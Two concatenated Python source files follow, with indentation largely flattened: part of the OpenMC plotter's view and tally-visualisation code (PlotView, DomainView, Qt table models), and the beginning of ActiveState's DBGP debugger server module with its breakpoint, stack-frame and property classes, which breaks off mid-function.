for idx, nuclide in enumerate(tally.nuclides):
if nuclide in nuclides:
selected_nuclides.append(idx)
data = _do_op(data[..., np.array(selected_nuclides)], tally_value, -1)
# get data limits
data_min = np.min(data)
data_max = np.max(data)
# for all combinations of spatial bins, create a mask
# and set image data values
spatial_filters = list(spatial_filter_bins.keys())
spatial_bins = list(spatial_filter_bins.values())
for bin_indices in itertools.product(*spatial_bins):
# look up the tally value
tally_val = data[bin_indices]
if tally_val == 0.0:
continue
# generate a mask with the correct size
mask = np.full(self.ids.shape, True, dtype=bool)
for tally_filter, bin_idx in zip(spatial_filters, bin_indices):
bin = tally_filter.bins[bin_idx]
if isinstance(tally_filter, openmc.CellFilter):
mask &= self.cell_ids == bin
elif isinstance(tally_filter, openmc.MaterialFilter):
mask &= self.mat_ids == bin
elif isinstance(tally_filter, openmc.UniverseFilter):
# get the statepoint summary
univ_cells = self.statepoint.universes[bin].cells
for cell in univ_cells:
mask &= self.cell_ids == cell
# set image data values
data_out[mask] = tally_val
# mask out invalid values
image_data = np.ma.masked_where(data_out < 0.0, data_out)
return image_data, None, data_min, data_max
def _create_tally_mesh_image(self, tally, tally_value, scores, nuclides, view=None):
# some variables used throughout
if view is None:
            view = self.currentView
sp = self.statepoint
mesh_filter = tally.find_filter(openmc.MeshFilter)
mesh = mesh_filter.mesh
def _do_op(array, tally_value, ax=0):
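            # As above: sum means directly, combine standard deviations in
            # quadrature assuming independent bins.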
if tally_value == 'mean':
return np.sum(array, axis=ax)
elif tally_value == 'std_dev':
return np.sqrt(np.sum(array**2, axis=ax))
# start with reshaped data
data = tally.get_reshaped_data(tally_value)
# determine basis indices
if view.basis == 'xy':
h_ind = 0
v_ind = 1
ax = 2
elif view.basis == 'yz':
h_ind = 1
v_ind = 2
ax = 0
else:
h_ind = 0
v_ind = 2
ax = 1
# adjust corners of the mesh for a translation
# applied to the mesh filter
lower_left = mesh.lower_left
upper_right = mesh.upper_right
width = mesh.width
dimension = mesh.dimension
if hasattr(mesh_filter, 'translation') and mesh_filter.translation is not None:
lower_left += mesh_filter.translation
upper_right += mesh_filter.translation
# For 2D meshes, add an extra z dimension
if len(mesh.dimension) == 2:
lower_left = np.hstack((lower_left, -1e50))
upper_right = np.hstack((upper_right, 1e50))
width = np.hstack((width, 2e50))
dimension = np.hstack((dimension, 1))
# reduce data to the visible slice of the mesh values
k = int((view.origin[ax] - lower_left[ax]) // width[ax])
# setup slice
data_slice = [None, None, None]
data_slice[h_ind] = slice(dimension[h_ind])
data_slice[v_ind] = slice(dimension[v_ind])
data_slice[ax] = k
        if k < 0 or k >= dimension[ax]:
return (None, None, None, None)
# move mesh axes to the end of the filters
filter_idx = [type(filter) for filter in tally.filters].index(openmc.MeshFilter)
data = np.moveaxis(data, filter_idx, -1)
# reshape data (with zyx ordering for mesh data)
data = data.reshape(data.shape[:-1] + tuple(dimension[::-1]))
data = data[..., data_slice[2], data_slice[1], data_slice[0]]
# sum over the rest of the tally filters
for tally_filter in tally.filters:
if type(tally_filter) == openmc.MeshFilter:
continue
if tally_filter in self.appliedFilters:
selected_bins = self.appliedFilters[tally_filter]
# sum filter data for the selected bins
data = data[np.array(selected_bins)].sum(axis=0)
else:
# if the filter is completely unselected,
                # set all of its data to zero and remove the axis
data[:, ...] = 0.0
data = _do_op(data, tally_value)
# filter by selected nuclides
if not nuclides:
data = 0.0
selected_nuclides = []
for idx, nuclide in enumerate(tally.nuclides):
if nuclide in nuclides:
selected_nuclides.append(idx)
data = _do_op(data[np.array(selected_nuclides)], tally_value)
# filter by selected scores
if not scores:
data = 0.0
selected_scores = []
for idx, score in enumerate(tally.scores):
if score in scores:
selected_scores.append(idx)
data = _do_op(data[np.array(selected_scores)], tally_value)
# get dataset's min/max
data_min = np.min(data)
data_max = np.max(data)
# set image data, reverse y-axis
image_data = data[::-1, ...]
# return data extents (in cm) for the tally
extents = [lower_left[h_ind], upper_right[h_ind],
lower_left[v_ind], upper_right[v_ind]]
return image_data, extents, data_min, data_max
class PlotView(openmc.lib.plot._PlotBase):
""" View settings for OpenMC plot.
Parameters
----------
origin : 3-tuple of floats
Origin (center) of plot view
    width : float
Width of plot view in model units
height : float
Height of plot view in model units
Attributes
----------
origin : 3-tuple of floats
Origin (center) of plot view
width : float
Width of the plot view in model units
height : float
Height of the plot view in model units
h_res : int
Horizontal resolution of plot image
v_res : int
Vertical resolution of plot image
aspectLock : bool
Indication of whether aspect lock should be maintained to
prevent image stretching/warping
basis : {'xy', 'xz', 'yz'}
The basis directions for the plot
colorby : {'cell', 'material', 'temperature', 'density'}
        Quantity used to color the plot
masking : bool
Indication of whether cell/material masking is active
maskBackground : 3-tuple of int
RGB color to apply to masked cells/materials
    highlighting : bool
Indication of whether cell/material highlighting is active
highlightBackground : 3-tuple of int
RGB color to apply to non-highlighted cells/materials
highlightAlpha : float between 0 and 1
Alpha value for highlight background color
highlightSeed : int
Random number seed used to generate color scheme when highlighting
is active
domainBackground : 3-tuple of int
RGB color to apply to plot background
color_overlaps : bool
Indicator of whether or not overlaps will be shown
overlap_color : 3-tuple of int
RGB color to apply for cell overlap regions
cells : Dict of DomainView instances
Dictionary of cell view settings by ID
materials : Dict of DomainView instances
Dictionary of material view settings by ID
domainAlpha : float between 0 and 1
Alpha value of the geometry plot
    domainVisible : bool
Controls visibility of geometry
    outlines : bool
Controls visibility of geometry outlines
tallyDataColormap : str
Name of the colormap used for tally data
tallyDataVisible : bool
Indicator for whether or not the tally data is visible
tallyDataAlpha : float
Value of the tally image alpha
tallyDataIndicator : bool
Indicates whether or not the data indicator is active on the tally colorbar
tallyDataMin : float
Minimum scale value for tally data
tallyDataMax : float
        Maximum scale value for tally data
tallyDataLogScale : bool
Indicator of logarithmic scale for tally data
tallyMaskZeroValues : bool
Indicates whether or not zero values in tally data should be masked
    clipTallyData : bool
Indicates whether or not tally data is clipped by the colorbar min/max
tallyValue : str
Indicator for what type of value is displayed in plots.
tallyContours : bool
Indicates whether or not tallies are displayed as contours
tallyContourLevels : str
        Number of contour levels or explicit level values
selectedTally : str
Label of the currently selected tally
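    Notes
    -----
    Instances are created with the geometry's bounding-box center and
    dimensions (see the default-view construction above) and are then
    mutated through the GUI; the llc/urc properties expose the resulting
    view corners for the chosen basis.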
"""
def __init__(self, origin, width, height):
""" Initialize PlotView attributes """
super().__init__()
# View Parameters
self.level = -1
self.origin = origin
self.width = width
self.height = height
self.h_res = 1000
self.v_res = 1000
self.aspectLock = True
self.basis = 'xy'
# Geometry Plot
self.colorby = 'material'
self.masking = True
self.maskBackground = (0, 0, 0)
self.highlighting = False
self.highlightBackground = (80, 80, 80)
self.highlightAlpha = 0.5
self.highlightSeed = 1
self.domainBackground = (50, 50, 50)
self.overlap_color = (255, 0, 0)
self.domainAlpha = 1.0
self.domainVisible = True
self.outlines = False
self.colormaps = {'temperature': 'Oranges', 'density': 'Greys'}
# set defaults for color dialog
self.data_minmax = {prop: (0.0, 0.0) for prop in _MODEL_PROPERTIES}
self.user_minmax = {prop: (0.0, 0.0) for prop in _MODEL_PROPERTIES}
self.use_custom_minmax = {prop: False for prop in _MODEL_PROPERTIES}
self.data_indicator_enabled = {prop: False for prop in _MODEL_PROPERTIES}
self.color_scale_log = {prop: False for prop in _MODEL_PROPERTIES}
# Get model domain info
self.cells = self.getDomains('cell')
self.materials = self.getDomains('material')
# Tally Viz Settings
self.tallyDataColormap = 'spectral'
self.tallyDataVisible = True
self.tallyDataAlpha = 1.0
self.tallyDataIndicator = False
self.tallyDataUserMinMax = False
self.tallyDataMin = 0.0
self.tallyDataMax = np.inf
self.tallyDataLogScale = False
self.tallyMaskZeroValues = False
self.clipTallyData = False
self.tallyValue = "Mean"
self.tallyContours = False
self.tallyContourLevels = ""
self.selectedTally = None
def __hash__(self):
return hash(self.__dict__.__str__() + self.__str__())
@staticmethod
def getDomains(domain_type):
""" Return dictionary of domain settings.
Retrieve cell or material ID numbers and names from .xml files
and convert to DomainView instances with default view settings.
Parameters
----------
domain_type : {'cell', 'material'}
Type of domain to retrieve for dictionary
Returns
-------
domains : Dictionary of DomainView instances
Dictionary of cell/material DomainView instances keyed by ID
"""
if domain_type not in ('cell', 'material'):
raise ValueError("Domain type, {}, requested is neither "
"'cell' nor 'material'.".format(domain_type))
lib_domain = None
if domain_type == 'cell':
lib_domain = openmc.lib.cells
elif domain_type == 'material':
lib_domain = openmc.lib.materials
domains = {}
for domain, domain_obj in lib_domain.items():
name = domain_obj.name
domains[domain] = DomainView(domain, name, random_rgb())
# always add void to a material domain at the end
if domain_type == 'material':
void_id = _VOID_REGION
domains[void_id] = DomainView(void_id, "VOID",
(255, 255, 255),
False,
False)
return domains
def getDataLimits(self):
return self.data_minmax
def getColorLimits(self, property):
if self.use_custom_minmax[property]:
return self.user_minmax[property]
else:
return self.data_minmax[property]
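    # llc/urc give the view's lower-left and upper-right corners in 3-D, with
    # the out-of-plane coordinate pinned to the origin for the current basis.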
@property
def llc(self):
if self.basis == 'xy':
x = self.origin[0] - self.width / 2.0
y = self.origin[1] - self.height / 2.0
z = self.origin[2]
elif self.basis == 'yz':
x = self.origin[0]
y = self.origin[1] - self.width / 2.0
z = self.origin[2] - self.height / 2.0
else:
x = self.origin[0] - self.width / 2.0
y = self.origin[1]
z = self.origin[2] - self.height / 2.0
return x, y, z
@property
def urc(self):
if self.basis == 'xy':
x = self.origin[0] + self.width / 2.0
y = self.origin[1] + self.height / 2.0
z = self.origin[2]
elif self.basis == 'yz':
x = self.origin[0]
y = self.origin[1] + self.width / 2.0
z = self.origin[2] + self.height / 2.0
else:
x = self.origin[0] + self.width / 2.0
y = self.origin[1]
z = self.origin[2] + self.height / 2.0
return x, y, z
def adopt_plotbase(self, view):
"""
Applies only the geometric aspects of a view to the current view
Parameters
----------
view : PlotView
View to take parameters from
"""
self.origin = view.origin
self.width = view.width
self.height = view.height
        self.h_res = view.h_res
        self.v_res = view.v_res
self.basis = view.basis
class DomainView():
""" Represents view settings for OpenMC cell or material.
Parameters
----------
id : int
Unique identifier for cell/material
name : str
Name of cell/material
color : 3-tuple of int or str
RGB or SVG color of cell/material (defaults to None)
masked : bool
Indication of whether cell/material should be masked
(defaults to False)
highlight : bool
Indication of whether cell/material should be highlighted
(defaults to False)
"""
def __init__(self, id, name, color=None, masked=False, highlight=False):
""" Initialize DomainView instance """
self.id = id
self.name = name
self.color = color
self.masked = masked
self.highlight = highlight
def __repr__(self):
return ("id: {} \nname: {} \ncolor: {} \
\nmask: {} \nhighlight: {}\n\n".format(self.id,
self.name,
self.color,
self.masked,
self.highlight))
    def __eq__(self, other):
        if isinstance(other, DomainView):
            return self.__dict__ == other.__dict__
        return NotImplemented
class DomainTableModel(QAbstractTableModel):
""" Abstract Table Model of cell/material view attributes """
def __init__(self, domains):
super().__init__()
self.domains = [dom for dom in domains.values()]
def rowCount(self, index=QModelIndex()):
return len(self.domains)
def columnCount(self, index=QModelIndex()):
return 6
def data(self, index, role=Qt.DisplayRole):
if not index.isValid() or not (0 <= index.row() < len(self.domains)):
return None
domain = self.domains[index.row()]
column = index.column()
if role == Qt.DisplayRole:
if column == ID:
return domain.id
elif column == NAME:
return domain.name if domain.name is not None else '--'
elif column == COLOR:
return '' if domain.color is not None else '+'
elif column == COLORLABEL:
return str(domain.color) if domain.color is not None else '--'
elif column == MASK:
return None
elif column == HIGHLIGHT:
return None
elif role == Qt.ToolTipRole:
if column == NAME:
return 'Double-click to edit'
elif column in (COLOR, COLORLABEL):
return 'Double-click to edit \nRight-click to clear'
elif column in (MASK, HIGHLIGHT):
return 'Click to toggle'
elif role == Qt.TextAlignmentRole:
if column in (MASK, HIGHLIGHT, COLOR):
return int(Qt.AlignCenter | Qt.AlignVCenter)
else:
return int(Qt.AlignLeft | Qt.AlignVCenter)
elif role == Qt.BackgroundColorRole:
color = domain.color
if column == COLOR:
if isinstance(color, tuple):
return QColor.fromRgb(*color)
elif isinstance(color, str):
return QColor.fromRgb(*openmc.plots._SVG_COLORS[color])
elif role == Qt.CheckStateRole:
if column == MASK:
return Qt.Checked if domain.masked else Qt.Unchecked
elif column == HIGHLIGHT:
return Qt.Checked if domain.highlight else Qt.Unchecked
return None
def headerData(self, section, orientation, role=Qt.DisplayRole):
if role == Qt.TextAlignmentRole:
if orientation == Qt.Horizontal:
return int(Qt.AlignLeft | Qt.AlignVCenter)
return int(Qt.AlignRight | Qt.AlignVCenter)
elif role == Qt.DisplayRole:
if orientation == Qt.Horizontal:
headers = ['ID', 'Name', 'Color',
'SVG/RGB', 'Mask', 'Highlight']
return headers[section]
return int(section + 1)
return None
def flags(self, index):
if not index.isValid():
return Qt.ItemIsEnabled
elif index.column() in (MASK, HIGHLIGHT):
return Qt.ItemFlags(Qt.ItemIsEnabled | Qt.ItemIsUserCheckable |
Qt.ItemIsSelectable)
elif index.column() in (NAME, COLORLABEL):
return Qt.ItemFlags(Qt.ItemIsEnabled | Qt.ItemIsEditable |
Qt.ItemIsSelectable)
elif index.column() == COLOR:
return Qt.ItemFlags(Qt.ItemIsEnabled | Qt.ItemIsEditable)
else:
return Qt.ItemFlags(Qt.ItemIsEnabled | Qt.ItemIsSelectable)
def setData(self, index, value, role=Qt.EditRole):
if not index.isValid() or not (0 <= index.row() < len(self.domains)):
return False
domain = self.domains[index.row()]
column = index.column()
if column == NAME:
domain.name = value if value else None
elif column == COLOR:
domain.color = value
elif column == COLORLABEL:
domain.color = value
elif column == MASK:
if role == Qt.CheckStateRole:
domain.masked = True if value == Qt.Checked else False
elif column == HIGHLIGHT:
if role == Qt.CheckStateRole:
domain.highlight = True if value == Qt.Checked else False
self.dataChanged.emit(index, index)
return True
class DomainDelegate(QItemDelegate):
def __init__(self, parent=None):
super().__init__(parent)
def sizeHint(self, option, index):
fm = option.fontMetrics
column = index.column()
if column == ID:
return QSize(fm.boundingRect("XXXXXX").width(), fm.height())
elif column == COLOR:
return QSize(fm.boundingRect("XXXXXX").width(), fm.height())
elif column == COLORLABEL:
return QSize(fm.boundingRect("X(XXX, XXX, XXX)X").width(), fm.height())
elif column == MASK:
return QSize(fm.boundingRect("XXXX").width(), fm.height())
else:
return QItemDelegate.sizeHint(self, option, index)
def createEditor(self, parent, option, index):
if index.column() == COLOR:
dialog = QColorDialog(parent)
return dialog
elif index.column() == COLORLABEL:
return QLineEdit(parent)
else:
return QItemDelegate.createEditor(self, parent, option, index)
def setEditorData(self, editor, index):
if index.column() == COLOR:
color = index.data(Qt.BackgroundColorRole)
color = 'white' if color is None else color
editor.setCurrentColor(color)
elif index.column() in (NAME, COLORLABEL):
text = index.data(Qt.DisplayRole)
if text != '--':
editor.setText(text)
def editorEvent(self, event, model, option, index):
if index.column() in (COLOR, COLORLABEL):
if not int(index.flags() & Qt.ItemIsEditable) > 0:
return False
if event.type() == QEvent.MouseButtonRelease \
and event.button() == Qt.RightButton:
self.setModelData(None, model, index)
return True
return False
else:
return QItemDelegate.editorEvent(self, event, model, option, index)
def setModelData(self, editor, model, index):
row = index.row()
column = index.column()
if column == COLOR and editor is None:
model.setData(index, None, Qt.BackgroundColorRole)
model.setData(model.index(row, column+1), None, Qt.DisplayRole)
elif column == COLOR:
color = editor.currentColor()
if color != QColor():
color = color.getRgb()[:3]
model.setData(index, color, Qt.BackgroundColorRole)
model.setData(model.index(row, column+1),
color,
Qt.DisplayRole)
elif column == COLORLABEL:
if editor is None:
model.setData(model.index(row, column-1),
None,
Qt.BackgroundColorRole)
model.setData(index, None, Qt.DisplayRole)
elif editor.text().lower() in openmc.plots._SVG_COLORS:
svg = editor.text().lower()
color = openmc.plots._SVG_COLORS[svg]
model.setData(model.index(row, column-1),
color,
Qt.BackgroundColorRole)
model.setData(index, svg, Qt.DisplayRole)
else:
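                # Otherwise interpret the text as an RGB tuple literal, e.g.
                # "(255, 160, 0)", requiring three ints in the range 0-255.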
try:
input = literal_eval(editor.text())
except (ValueError, SyntaxError):
return None
if not isinstance(input, tuple) or len(input) != 3:
return None
for val in input:
if not isinstance(val, int) or not 0 <= val <= 255:
return None
model.setData(model.index(row, column-1),
input,
Qt.BackgroundColorRole)
model.setData(index, input, Qt.DisplayRole)
else:
QItemDelegate.setModelData(self, editor, model, index)
|
server.py
|
#!/usr/bin/env python
# Copyright (c) 2003-2006 ActiveState Software Inc.
#
# The MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify,
# merge, publish, distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is furnished
# to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
#
# Authors:
# Shane Caraveo <ShaneC@ActiveState.com>
# Trent Mick <TrentM@ActiveState.com>
"""DBGP Server API module.
Generally this builds upon the lower-level dbgp.serverBase module to provide
a full module interface for a DBGP server. This module interface can be
used to provide a command-line or GUI debugger interface using the DBGP
protocol.
"""
import os
import sys
import socket, string, base64, urllib
import threading
import types
import logging
from xml.dom import minidom
import copy
import dbgp.listcmd as listcmd
import dbgp.serverBase
from dbgp.common import *
#XXX Try to avoid dependence on PyXPCOM infrastructure in this file.
try:
from xpcom import COMException, ServerException
except ImportError:
COMException = ServerException = None
#---- globals
log = logging.getLogger("dbgp.server")
#log.setLevel(logging.DEBUG)
proplog = logging.getLogger("dbgp.property")
#proplog.setLevel(logging.DEBUG)
bplog = logging.getLogger("dbgp.breakpoints")
#bplog.setLevel(logging.DEBUG)
#---- internal support routines
#Note: this is not prefixed with "_" because it is being used in koDBGP.py.
def getErrorInfo(ex):
"""Given a DBGPError exception return (errno, errmsg).
This is a separate method because (1) the assignment of args to DBGPError
is not consistent and (2) the exception may also be an XPCOM COMException,
in which case error info is expected to be on koILastErrorService.
"""
if isinstance(ex, DBGPError):
#XXX _Try_ to get the error message out of the DBGPError. There
# is no good standard for DBGPError args right now though,
# hence the pain here.
if len(ex.args) == 2: # typically this is (errmsg, errno)
errmsg = ex.args[0]
try:
errno = int(ex.args[1]) # sometimes this is a string
except ValueError:
errno = 0
elif len(ex.args) == 1 and not hasattr(ex.args[0], "__len__"):
# bug94837: if we're hovering over an unevaluate-able string,
# we only get the numeric code in ex.args, so pull the message
# out of ex.msg
try:
errmsg = ex.msg
errno = ex.args[0]
except:
pass
else:
errmsg = ex.args[0]
errno = 0
elif isinstance(ex, COMException):
from xpcom import components
lastErrorSvc = components.classes["@activestate.com/koLastErrorService;1"].\
getService(components.interfaces.koILastErrorService)
errno, errmsg = lastErrorSvc.getLastError()
return (errno, errmsg)
#---- DBGP server class hierarchy
class dataType:
def __init__(self):
        self.commonType = ''
        self.languageType = ''
        self.schemaType = ''
def initWithNode(self, node):
self.commonType = node.getAttribute('type')
self.languageType = node.getAttribute('name')
if node.hasAttribute('xsi:type'):
self.schemaType = node.getAttribute('xsi:type')
def __repr__(self):
return "%s:%s:%s" % (self.commonType, self.languageType, self.schemaType)
class breakpoint:
"""A DBGP Breakpoint.
Mostly this is a "dumb" object that just holds the relevant breakpoint
attributes. It knows how to update and clone itself, but not much more.
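    A line breakpoint, for example, is typically built with initLine() and
    then handed to the breakpointManager, which assigns its guid and pushes
    it out to active debug sessions.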
"""
# List of data attributes relevant for persistence and updating.
# Note: This last must be kept in sync with the DBGP breakpoint spec.
_attrs = ["language", "type", "filename", "lineno", "functionName",
"state", "hitCount", "hitValue", "hitCondition", "temporary",
"exceptionName", "expression"]
def __init__(self):
# Core breakpoint attributes. These should only be modified either
# (1) by initializing via one of the .init*() methods; or
# (2) via the breakpointManager.
self.language = ''
self.type = ''
self.filename = ''
self.lineno = -1
self.functionName = ''
self.state = 'enabled'
self.exceptionName = ''
self.expression = ''
self.temporary = 0
self.hitCount = 0
self.hitValue = 0
self.hitCondition = None
# A unique breakpoint id (a number) that is assigned and controlled
# by the breakpointManager.
# Note: This is not just called "id" to avoid confusion with the
# breakpoint id's assigned by each session.
# Note: While called a "guid", this is NOT one of those long COM
# GUID strings, e.g. {5F7CB810-0AC8-4BBD-B8C1-8470E516EDBC}.
self._guid = None
# the breakpoint id as set by the debugger engine
self._bpid = None
def getGuid(self):
return self._guid
def clone(self):
"""Return a copy of this breakpoint.
This is required for proper updating of a breakpoint via
breakpointUpdate.
"""
return copy.copy(self)
def update(self, bp):
"""Update with the given breakpoint data and return a list of
changed attributes.
"""
attrNames = []
for attrName in self._attrs:
try:
oldValue = getattr(self, attrName)
except Exception, ex:
log.error("failed to get old value of '%s' attribute: %s",
attrName, ex)
raise
try:
newValue = getattr(bp, attrName)
except Exception, ex:
log.error("failed to get new value of '%s' attribute: %s",
attrName, ex)
raise
if newValue != oldValue:
attrNames.append(attrName)
try:
setattr(self, attrName, newValue)
except Exception, ex:
log.error("update of '%s' attribute to '%s' failed: %s",
attrName, newValue, ex)
raise
return attrNames
def getName(self):
if self.type == "line":
name = "%s, line %s" % (os.path.basename(self.filename), self.lineno)
elif self.type in ["conditional", "watch"]:
name = "'%s' watched" % self.expression
if self.filename:
name += " in %s" % os.path.basename(self.filename)
if self.lineno >= 1:
name += ", line %s" % self.lineno
elif self.type in ["call", "return"]:
name = "%s %s" % (self.functionName, self.type)
if self.filename:
name += " in %s" % os.path.basename(self.filename)
elif self.type == "exception":
name = "Exception %s" % self.exceptionName
if self.filename:
name += " in %s" % os.path.basename(self.filename)
else:
log.error("unknown breakpoint type: '%s'" % self.type)
name = "???"
return name
#---- Breakpoint initialization methods.
def initConditional(self, lang, cond, file, line, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'conditional'
self.filename = file
self.lineno = line
self.state = state
self.expression = cond
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initWatch(self, lang, watch, file, line, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'watch'
self.filename = file
self.lineno = line
self.state = state
self.expression = watch
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initLine(self, lang, file, line, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'line'
self.filename = file
self.lineno = line
self.state = state
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initException(self, lang, exceptionName, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'exception'
self.state = state
self.exceptionName = exceptionName
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initCall(self, lang, func, filename, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'call'
self.filename = filename
self.functionName = func
self.state = state
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initReturn(self, lang, func, filename, state, temporary=None,
hitValue=None, hitCondition=None):
self.language = lang
self.type = 'return'
self.filename = filename
self.functionName = func
self.state = state
self.temporary = temporary
self.hitValue = hitValue
self.hitCondition = hitCondition
def initWithNode(self, node):
# id="%d" type="%s" filename="%s" lineno="%d" function="%s"
# state="%s" exception="%s"
# expression is a child element with name of expression
self.type = node.getAttribute('type')
if node.hasAttribute('id'):
self._bpid = node.getAttribute('id')
if node.hasAttribute('filename'):
self.filename = node.getAttribute('filename')
if node.hasAttribute('lineno'):
self.lineno = int(node.getAttribute('lineno'))
if node.hasAttribute('function'):
self.functionName = node.getAttribute('function')
if node.hasAttribute('state'):
self.state = node.getAttribute('state')
if node.hasAttribute('exception'):
self.exceptionName = node.getAttribute('exception')
if node.hasAttribute('temporary'):
self.temporary = int(node.getAttribute('temporary'))
if node.hasAttribute('hit_count'):
self.hitCount = int(node.getAttribute('hit_count'))
if node.hasAttribute('hit_value'):
self.hitValue = int(node.getAttribute('hit_value'))
if node.hasAttribute('hit_condition'):
self.hitCondition = node.getAttribute('hit_condition')
if self.type == 'expression':
try:
self.expression = base64.decodestring(node.firstChild.firstChild.nodeValue)
except:
self.expression = node.firstChild.firstChild.nodeValue
def __repr__(self):
data = ("type:%(type)s filename:%(filename)s "
"lineno:%(lineno)s function:%(functionName)s state:%(state)s "
"exception:%(exceptionName)s expression:%(expression)s "
"temporary:%(temporary)s hit_count:%(hitCount)s "
"hit_value:%(hitValue)s hit_condition:%(hitCondition)s"
% self.__dict__)
return "<%s: %s>" % (self.__class__, data)
def getSetArgs(self):
"""Return a list of options for a 'breakpoint_set' command."""
args = ['-t', self.type]
data = None
if self.filename:
filename = self.filename
if filename[8:].startswith('file:/'):
filename = self.filename[8:]
args += ['-f', filename]
if self.type == 'line':
args += ['-n', self.lineno]
elif self.type in ['call', 'return']:
args += ['-m', self.functionName]
elif self.type == 'exception':
args += ['-x', self.exceptionName]
elif self.type in ['conditional', 'watch']:
if self.lineno:
args += ['-n', self.lineno]
data = self.expression
else:
raise DBGPError('breakpoint type [%s] not supported' % self.type)
if self.state:
args += ['-s', self.state]
# Add common optional arguments, if necessary.
args += ['-r', int(self.temporary)]
if self.hitValue is not None:
args += ['-h', self.hitValue]
if self.hitCondition:
args += ['-o', self.hitCondition]
args = [str(i) for i in args] # Return a stringified command version.
return (args, data)
class spawnpoint(breakpoint):
"""A DBGP Spawnpoint.
XXX Inheriting from koIDBGPBreakpoint is messy (because it is not a
a proper superset). Should find a common base and use that.
"""
# List of data attributes relevant for persistence and updating.
# Note: This last must be kept in sync with the DBGP spawnpoint spec.
_attrs = ["language", "type", "filename", "lineno", "state"]
def init(self, lang, filename, line, state):
self.language = lang
self.type = 'spawn'
self.filename = filename
self.lineno = line
self.state = state
def getName(self):
name = "%s, line %s" % (os.path.basename(self.filename), self.lineno)
return name
def __repr__(self):
data = ("type:%(type)s filename:%(filename)s "
"lineno:%(lineno)s state:%(state)s "
% self.__dict__)
return "<%s: %s>" % (self.__class__, data)
def getSetArgs(self):
"""Return a list of options for a 'spawnpoint_set' command."""
# tcl doesn't do any magic for us, we must be explicit
filename = self.filename
if filename[8:].startswith('file:/'):
filename = self.filename[8:]
args = ['-s', self.state,
'-n', self.lineno,
                '-f', filename]
args = [str(i) for i in args] # Return a stringified command version.
return (args, None)
class contextType:
def __init__(self):
self.id = -1
self.name = ''
def initWithNode(self, node):
# name="Local" id="0"
if node.hasAttribute('id'):
self.id = int(node.getAttribute('id'))
self.name = node.getAttribute('name')
def __repr__(self):
return "%d: %s" %(self.id, self.name)
class stackFrame:
def __init__(self):
self.depth = -1
self.filename = ''
self.lineno = -1
self.type = ''
self.where = ''
self.beginLine = 0
self.beginOffset = 0
self.endLine = 0
self.endOffset = 0
self.inputFrame = None
def initWithNode(self, node):
# level="%d" type="%s" filename="%s" lineno="%d" where="%s"
if node.hasAttribute('level'):
self.depth = int(node.getAttribute('level'))
if node.hasAttribute('filename'):
self.filename = node.getAttribute('filename')
if node.hasAttribute('lineno'):
self.lineno = int(node.getAttribute('lineno'))
if node.hasAttribute('type'):
self.type = node.getAttribute('type')
if node.hasAttribute('where'):
self.where = node.getAttribute('where')
if node.hasAttribute('cmdbegin'):
begin = node.getAttribute('cmdbegin')
try:
(self.beginLine, self.beginOffset) = begin.split(':')
except:
# if the attribute is invalid, ignore it
log.warn('stack cmdbegin attribute is incorrect [%s]', begin)
if node.hasAttribute('cmdend'):
end = node.getAttribute('cmdend')
try:
(self.endLine, self.endOffset) = end.split(':')
except:
# if the attribute is invalid, ignore it
log.warn('stack cmdend attribute is incorrect [%s]', end)
input = node.getElementsByTagName('input')
if len(input) > 0:
# XXX more than one input frame?
self.inputFrame = stackFrame()
self.inputFrame.initWithNode(input[0])
def __repr__(self):
return "frame: %d %s(%d) %s %s" % \
(self.depth, self.filename, self.lineno, self.type, self.where)
class property:
_tooltip = None
def __init__(self):
        self._tooltip = None
self.name = ''
self.id = ''
self.fullname = ''
self.type = ''
self.typeName = ''
self.typeScheme = ''
self.classname = ''
self.facets = ''
self.size = 0
self.children = 0
self.numchildren = 0
self.address = 0
self.recursive = 0
self.encoding = ''
self.key = ''
self.value = ''
self.node = None
self.childProperties = []
self.session = None
self.contextId = 0
self.depth = 0
def _getCData(self, node):
value = ''
encoding = ''
if node.hasAttribute('encoding'):
encoding = node.getAttribute('encoding')
for child in node.childNodes:
if child.nodeType in [minidom.Node.TEXT_NODE,
minidom.Node.CDATA_SECTION_NODE]:
value = value + child.nodeValue
try:
if value and (self.encoding == 'base64' or encoding == 'base64'):
value = base64.decodestring(value)
except:
pass
return value
def _decode_unicode_or_byte_string(self, s, name):
# The only reason for this function is that PHP/Xdebug
# leaves the name and fullname attributes as raw, utf-8 strings.
# It should store them in name and fullname tags, with a
# base64-encoding
try:
if type(s) == types.UnicodeType:
return s.encode('latin1').decode('utf-8')
elif type(s) == types.StringType:
return s.decode('utf-8')
except UnicodeDecodeError:
proplog.warn("Unable to decode attr %s, value %r", name, s)
return s
def _ensure_unicode(self, s, context):
# Any string that goes through pyxpcom as an AString should be
# converted to Unicode. Otherwise pyxpcom will do whatever it feels
# like to convert the string. Sometimes it gets it right, but
# other times it treats latin1 as utf-8 (and complains about invalid
# bytes, or treats utf-8 as latin1 (and we get doubly-escaped utf8).
# Also, it if treats an encoding like a cyrillic one as latin1, the
# resulting characters won't be recognizable.
#
# Doing this fixes this problem.
if isinstance(s, str):
try:
